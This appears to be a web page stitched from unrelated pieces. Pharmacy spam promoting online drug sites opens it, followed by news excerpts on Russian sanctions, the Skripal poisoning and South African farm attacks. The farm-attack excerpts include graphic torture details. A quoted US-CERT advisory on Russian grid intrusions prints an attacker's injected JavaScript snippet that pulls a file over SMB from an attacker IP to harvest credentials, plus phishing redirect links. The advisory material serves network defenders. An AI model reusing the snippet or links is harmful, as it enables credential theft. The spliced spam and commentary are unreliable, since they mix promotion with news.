An affordable price is probably the major benefit persuading people to buy drugs at www.americanbestpills.com. The cost of medications in Canadian drugstores is considerably lower than anywhere else simply because the medications here are oriented on international customers. In many cases, you will be able to cut your costs to a great extent and probably even save up a big fortune on your prescription drugs. What's more, pharmacies of Canada offer free-of-charge shipping, which is a convenient addition to all other benefits on offer. Cheap price is especially appealing to those users who are tight on a budget
Service Quality and Reputation
Although some believe that buying online is buying a pig in the poke, it is not. Canadian online pharmacies are excellent sources of information and are open for discussions. There one can read tons of users' feedback, where they share their experience of using a particular pharmacy, say what they like or do not like about the drugs and/or service. Reputable online pharmacy canadianrxon.com take this feedback into consideration and rely on it as a kind of expert advice, which helps them constantly improve they service and ensure that their clients buy safe and effective drugs. Last, but not least is their striving to attract professional doctors. As a result, users can directly contact a qualified doctor and ask whatever questions they have about a particular drug. Most likely, a doctor will ask several questions about the condition, for which the drug is going to be used. Based on this information, he or she will advise to use or not to use this medication.
“Putin’s inner circle is already subject to personal U.S. sanctions, imposed over Russia’s 2014 annexation of Ukraine’s’ Crimea region,” the Reuters news agency points out. … “But the so-called ‘oligarchs’ list’ that was released on Tuesday … covers many
people beyond Putin’s circle and reaches deep into Russia’s business elite.”
Prime Minister Dmitry Medvedev is among the 114 senior political figures in Russia’s government who made the list, along with 42 of Putin’s aides, Cabinet ministers such as Foreign Minister Sergey Lavrov, and top officials in Russia’s leading spy agencies, the FSB and GRU. The CEOs of major state-owned companies, including energy giant Rosneft and Sberbank, are also on the list.
So are 96 wealthy Russians deemed “oligarchs” by the Treasury Department, which said each is believed to have assets totaling $1 billion or more. Some are the most famous of wealthy Russians, among them tycoons Roman Abramovich and Mikhail Prokhorov, who challenged Putin in the 2012 election. Aluminum magnate Oleg Deripaska, a figure in the Russia investigation over his ties to former Trump campaign chairman Paul Manafort, is included.
Russian Deputy Prime Minister Arkady Dvorkovich dismissed the list as simply a “who’s who” of Russian politics. He told Russian news agencies Tuesday he wasn’t surprised to find his name on the list, too, saying that it “looks like a ‘who’s who’ book.” Dvorkovich stopped short of saying how Russia would react to it, saying the Kremlin would “monitor the situation.” More here.
*** So when there are murder cases of Russian asylees in Britain, what are the agencies in the United States thinking?
Well there was Mikhail Lesin, a former friend of Putin found dead in his hotel in Dupont Circle, Washington DC. Then there was Operation Ghost Stories, the massive spy swap.
Imagine what the context and case reference is for the FBI when it comes to Russian operations in the United States and in allied countries.Or how many planes have been shot out of the sky where clues and evidence point to Russia? More explained in video below.
Beyond the attempted assassination of Skripal and his daughter in Salisbury two weeks ago, there was yet another confirmed death.
Whoever is behind the murder of a prominent Russian exile, who believed he was on a Kremlin hit list, managed to get inside his home without breaking in, police believe.
Nikolai Glushkov, 68, was found dead at home last week at his home in southwest London, and officers are now hunting for the culprits. His official cause of death is “compression to the neck.”
Before his death, Glushkov warned that a close friend of his had been murdered, and that he would be next.
In a Monday morning update on the investigation, the Metropolitan Police said they examined Glushkov’s house and found no signs of forced entry.
Activists say South African authorities are tacitly approving attacks on the country’s white farmers, with one being murdered every five days, and the police turning a blind eye to the violence.
The white nationalist lobbying group AfriForum says that when lawmakers passed a motion last month which could see land being seized from farmers without compensation, it sent a message that landowners could be attacked with impunity.
It said there have been 109 recorded attacks so far in 2018 and 15 farm murders, meaning that this year, one white farmer has been killed every five days.
In a statement, Ian Cameron, AfriForum’s Head of Safety said: “Our rural areas are trapped in a crime war. Although the South African government denies that a violence crisis is staring rural areas in the face, the numbers prove that excessive violence plague these areas.”
Gabriel Stols, 35, told the Independent how his younger brother Kyle, 21, was shot dead by four people on a game reserve near Bloemfontein.
“What is happening to us is torture, it is slaughter, it is brutal, it is revenge. The world doesn’t know what is happening in South Africa,” he said.
Hannetjie Ludik, 56, from Pretoria, told the paper that three armed men broke into her family’s house, stole money and raped her.
South Africa’s president Cyril Ramaphosa said the government did not condone attacks or the the seizure of white-owned farms and insisted there would be no repeat of what happened in Zimbabwe a generation ago.
But AfriForum says that the parliament’s bill has led to a culture of revenge among those spoiling for a redistribution of land in a country where some 80% of people describe themselves as black African, but only 1.2% of that community own the country’s rural land.
Julius Malema, the head of South Africa’s ultra-left Economic Freedom Fighters party (EFF), has called for land to be taken off white farmers. REUTERS/Siphiwe Sibeko
The policy was proposed by the leader of the Economic Freedom Fighters (EFF), Julius Malema who says redistributing land can correct historical injustices.
While there is broader political support for the move, a more measured approach is being called for by Kenneth Meshoe, the head of the African Christian Democratic Party, who told The Independent he believes in land distribution, although he says it should not be taken without compensation
“People like Malema who are promoting hate speech should not be allowed,” he added.
Thousands of people have signed a petition asking Donald Trump to let white people in South Africa to migrate to the U.S.
He provocatively said that such people could be helped from “a civilized country like ours”, sparking anger from South Africa’s Foreign Ministry which called for a retraction.
The fact-checking website, Africa Check, concluded in May 2017 that getting an accurate statistic on the country’s farm murder rate, which it estimated at 0.4 murders per 100,000 people, was “near impossible”.
Gareth Newham from South Africa’s Institute for Security Studies, told the Guardian there was no evidence white farmers were targeted any more than anyone else.
*** The world is silent on this….question is why?
In 2017:
The couple, who had lived in the area for 20 years, were tied up, stabbed, and tortured with a blowtorch for several hours. The masked men stuffed a plastic bag down Mrs Howarth’s throat, and attempted to strangle her husband with a bag around his neck.
The couple were bundled into their own truck, still in their pyjamas, and driven to a roadside where they were shot. Mrs Howarth, 64, a former pharmaceutical company executive, was shot twice in the head. Mr Lynn, 66, was shot in the neck.
Miraculously he survived, and managed to flag down a passer-by early on Sunday morning. Mrs Howarth, who police said was “unrecognisable” from her injuries, had multiple skull fractures, gunshot wounds and “horrific” burns to her breasts.
“Sue was discovered amongst some trees, lying in a ditch,” writes Jana Boshoff, reporter for the local Middelburg Observer newspaper. “Her rescuers managed to find her by following her groans of pain and then noticing drag marks from the road into the field.
In any other country, such a crime would be almost unthinkable. But in South Africa, these kinds of farm attacks are happening nearly every day. This year so far, there have been more than 70 attacks and around 25 murders in similar attacks on white farmers.
Earlier this month, for example, 64-year-old Nicci Simpson was tortured with a power drill during an attack involving three men at her home on a farm in the Vaal area, about two hours drive from Johannesburg.
When paramedics arrived, they found three dead dogs, and the woman lying in a pool of blood, spokesman Russel Meiring told News24. “They used a drill to torture her,” police spokesman Lungelo Dlamini said.
If there is no transportation, there is no food, medicine or basic supplies….what country is ready to deal with this?
British cities would be uninhabitable within days and the country is only a few meals from anarchy if the National Grid was taken down in a cyber attack or solar storm, disaster and security experts have warned.
Modern life is so reliant on electricity that a prolonged blackout would quickly lead to a loss of water, fuel, banking, transport and communications that would leave the country “in the Stone Age”.
The U.S. government has just released an important cybersecurity alert that confirms Russian government cyberattacks targeting energy and other critical infrastructure sectors in the United States.
While there has recently been a significant rise in cyberattacks in these industries, up to now we’ve only been able to speculate on who the actors are, or what their motives may be. In this case the threat actor and their strategic intent has been clearly confirmed, something the U.S. government rarely does publicly.
In addition, the US-CERT alert provides descriptions of each stage of the attack, detailed indicators of compromise (IOCs), and a long list of detection and prevention measures. Many of the attack tactics are like Dragonfly 2.0, so much so that one might call this an expanded playbook for Dragonfly. The Nozomi Networks solution ships today with an analysis toolkit that identifies the presence of Dragonfly 2.0 IOCs.
This article is intended to help you gain perspective on this recent alert, provide additional guidance on what security measures to take, and describe how the Nozomi Networks solution can help.
U.S. energy facilities, like this one, are one of the critical infrastructure targets of the Russian cyberattacks.
Multi-Stage Campaigns Provide Opportunities for Early Detection
The US-CERT alert characterizes this attack as a multi-stage cyber intrusion campaign where Russian cyber actors conducted spear phishing and gained remote access into targeted industrial networks. After obtaining access, the threat vectors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).
This pattern of behavior is typical of APTs (Advanced Persistent Threats). APTs occur over an extended period, meaning there is an opportunity to detect and stop them before damage is done. With the right technology monitoring the industrial network, it is much harder for them to go unobserved before their final attack.
In this case the Russian cyberattacks started by infecting staging targets, which are peripheral organizations, such as trusted third-party suppliers, as pivot points for attacking the final intended targets.
The attackers used a multitude of tactics involving information relevant to industrial control professionals for initial infection of the staging targets. Examples include:
Altering trade publication websites
Sending emails containing resumes for ICS personnel as infected Microsoft Word attachments
Analyzing publicly available photos that inadvertently contained information about industrial systems
The credentials of staging targets’ staff were in turn used to send spear phishing emails to the staff of the intended targets. They received malicious .docx files, which communicated with a command and control (C2) server to steal their credentials.
The SMB (Server Message Block) network protocol was used throughout the spear phishing phases to communicate with external servers, as was described for the Dragonfly 2.0 attacks.This is a distinctive tactic. SMB is usually only used to communicate within LANs, not for outbound communications. Now that this is known, asset owners should ensure their firewalls are locked down for outbound service restrictions.
The credentials of the intended targets were used to access victim’s networks. From there, the malware established multiple local administrator accounts, each with a specific purpose. The goals ranged from creation of additional accounts to cleanup activity. For the report, click here.
Forensic analysis shows that the threat actors sought information on network and organizational design and control system capabilities within the organization. In one instance, the report says, the threat actors downloaded a small photo from a publicly accessible human resource page, which, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background. The threat actors also compromised third-party suppliers to download source code for several intended targets’ websites. They also attempted to remotely access corporate web-based email and virtual private network (VPN) connections.
Once inside the intended target’s network, the threat actors used privileged credentials to access domain controllers via remote desktop protocols (RDP) and then used the batch scripts to enumerate hosts and users, as well as to capture screenshots of systems across the network.
The threat is inside. US-CERT on March 15 warned that threat actors associated with the Russian government had infiltrated ICS and SCADA systems at power plants using a variety of tactics. This image is a DHS reconstruction of a screenshot fragment of a human machine interface (HMI) that the threat actors accessed. Source: US-CERT
Along with publishing an extensive list of indicators of compromise, the DHS and FBI recommended that network administrators review IP addresses, domain names, file hashes, network signatures, and a consolidated set of YARA rules for malware associated with the intrusion authored by the National Cybersecurity and Communications Integration Center. YARA is an open-source and multiplatform tool that provides a mechanism to exploit code similarities between malware samples within a family.
US sanctions Russia for election interference, cyberattacks
The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”
CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”
The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.
“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”
The sanctions come after an investigation by the Department of Homeland Security and the FBI.
The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.
The Russian embassy didn’t respond to a request for comment.
‘A long-overdue step’
On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.
“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.
Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.
“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”
Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.
Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.
The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.
DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).
For a downloadable copy of IOC packages and associated files, see:
Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.
Description
Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.
Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)
This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”
Technical Details
The threat actors in this campaign employed a variety of TTPs, including
targeting industrial control system (ICS) infrastructure.
Using Cyber Kill Chain for Analysis
DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.
Stage 1: Reconnaissance
The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.
Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.
Stage 2: Weaponization
Spear-Phishing Email TTPs
Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]
Use of Watering Hole Domains
One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.
In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:
var i = document.createElement(“img”);
i.src = “file[:]//184.154.150[.]66/ame_icon.png”;
i.width = 3;
i.height=2;
Stage 3: Delivery
When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)
In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.
Stage 4: Exploitation
The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.
When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)
Stage 5: Installation
The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.
Establishing Local Accounts
The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.
The Russian delegation was sitting 3 chairs away from Ambassador Nikki Haley as she slammed Russia for their actions against Britain including the use of poison and the disdainful response by Putin towards Prime Minister Terresa May.
See the secret trial of the chemical weapon from Russia here.
As PM May expels almost 2 dozen Russian diplomats, actually they are spies, one wonders if Britain knew they were in country why they were not expelled previously. A theory has developed that Russian operatives applied the nerve agent, Novachok to the door handles of Skripal’s car. There was the case of the poison telephone:
Accounts of security deficiencies at weapons facilities indicate that, at least for a period in the 1990s, Moscow was not in firm control of its chemical weapons stockpiles or the people guarding them.
When Russian banking magnate Ivan Kivelidi and his secretary died in 1995 from organ failure after a military-grade poison was found on the telephone receiver of his Moscow office, an employee of a state chemical research institute confessed to having secretly supplied the toxin.
In a closed-door trial, Kivelidi’s business partner was convicted of poisoning Kivelidi over a dispute. At the trial, prosecutors said the business partner had obtained the poison, via several intermediaries, from Leonard Rink, an employee of a state chemical research institute known as GosNIIOKhT.
The same institute, according to Vil Mirzayanov, a Soviet chemical weapons scientist who later turned whistleblower, was part of the state chemical weapons programme and helped develop the “Novichok” family of nerve agents that Britain has said was responsible for poisoning Skripal. More here.
BRITAIN today ordered 23 Russian spooks to leave the country within a week in response to the spy poisoning scandal.
Theresa May told MPs that two dozen so-called diplomats who are in fact spies will be kicked out in a bid to stop Vladimir Putin meddling in Britain.
The PM said Russia had shown “contempt and defiance” in the aftermath of an attempt to kill ex-spy Sergei Skripal and warned that the poisoning represented “the unlawful use of force by Russia against the United Kingdom”.
She also confirmed that no ministers or members of the Royal Family will attend this summer’s World Cup in Russia – but stopped short of calling on the England team to pull out of the tournament.
Putin’s officials responded with fury, saying Britain’s tough response was “unacceptable, unjustified and shortsighted”.
But Jeremy Corbyn sparked anger when he suggested that Russia might NOT be behind the attack and compared the investigation to claims about Saddam Hussein’s WMDs.
Mrs May also announced this afternoon:
New laws to help Britain defend itself from all forms of hostile Russian activity
Flights and goods from Russia will face extra checks to stop ill-gotten gains entering the UK
All planned talks with Russian officials, including a visit from the foreign minister, are cancelled
Assets belonging to Putin’s government will be frozen to stop them being used for wrongdoing
Suspected spies could be detained at Britain’s borders like terrorists under new powers
The UK’s allies France, Germany and the US are in full support of her tough stance
The expulsion of 23 Russian spies is the toughest act of its kind for 30 years – and will almost certainly spark a tit-for-tat diplomatic war, with British diplomats likely to be kicked out of Moscow.
Mrs May told the House of Commons: “To those who seek to do us harm, our message is clear – you are not welcome here.”
Blasting Putin’s refusal to respond to her demand for an explanation, the PM said: “It was right to offer Russia the opportunity to provide an explanation.
“But their response has demonstrated complete disdain for the gravity of these events. They have provided no credible explanation that could suggest they lost control of their nerve agent.
“No explanation as to how this agent came to be used in the United Kingdom; no explanation as to why Russia has an undeclared chemical weapons programme in contravention of international law.
“Instead they have treated the use of a military grade nerve agent in Europe with sarcasm, contempt and defiance.
“There is no alternative conclusion other than that the Russian state was culpable for the attempted murder of Mr Skripal and his daughter – and for threatening the lives of other British citizens in Salisbury, including Detective Sergeant Nick Bailey.
“This represents an unlawful use of force by the Russian State against the United Kingdom.”
A police officer in a forensics suit as investigations continue into the poisoning
Any Russian spies who try to re-enter Britain will now be stopped at the border in the same way as terror suspects, the PM said.
She announced that sanctions on human rights violators will be stepped up, and vowed to freeze the assets of the Russian regime if they are being used to meddle in the UK.
Mrs May added: “We will continue to bring all the capabilities of UK law enforcement to bear against serious criminals and corrupt elites. There is no place for these people – or their money – in our country.”
Foreign minister Sergei Lavrov, who was due to visit Britain shortly, has had his invitation withdrawn, she announced.
The PM said: “I continue to believe it is not in our national interest to break off all dialogue between the United Kingdom and the Russian Federation.
“But in the aftermath of this appalling act against our country, this relationship cannot be the same.”
And she warned Putin that Britain will not stand alone, revealing that Donald Trump, Emmanuel Macron and Angela Merkel have promised to present a united front against Russian atrocities.
The Russian embassy in London responded to Mrs May’s statement with fury, saying: “We consider this hostile action as totally unacceptable, unjustified and shortsighted.
“All the responsibility for the deterioration of the Russia-UK relationship lies with the current political leadership of Britain.”
After today’s escalation of hostilities, Brits visiting Russia were warned they must avoid talking publically about politics in case they attract the regime’s attention.
The Foreign Office updated its travel advice for the country, telling tourists they could face “anti-British sentiment or harassment”.
Officials added: “You’re advised to remain vigilant, avoid any protests or demonstrations and avoid commenting publically on political developments.”
The Russian regime has refused to explain its role in the attempted hit – saying it will take at least ten days to respond to the PM’s ultimatum.
And ambassador Alexander Yakovenko went further today, saying: “Everything done today is absolutely unacceptable and we consider this a provocation.
“The UK should follow international law. They have to present the request to the organisation and we are happy to consider this within the ten days.
“We believe this is a very serious provocation and of course we are not ready to talk.”
Soldiers wearing protective clothing at an address in Gillingham
It has emerged that police are looking for a mysterious couple who may be witnesses to the attack on Mr Skripal and his daughter while the investigation has widened from Salisbury to Gillingham.
The PM set Russia a deadline of midnight last night to explain how nerve agent novichok came to be used in the brazen attack – but the regime responded by taunting Britain and boasting about its nuclear arsenal.
Mrs May held a meeting of the National Security Council this morning, before returning to the Commons to outline the next steps in the campaign to punish Russia for the assassination attempt.
Britain has also called for an emergency meeting of the UN Security Council in a bid to hold the regime to account, while the UK’s Nato allies pledged to stand firm alongside us.
This morning Sergei Lavrov, the Russian foreign minister, made the bizarre claim that Russia hasn’t actually received a formal request for information from the UK.
He said Putin’s government would take ten days to respond once the official message is received.
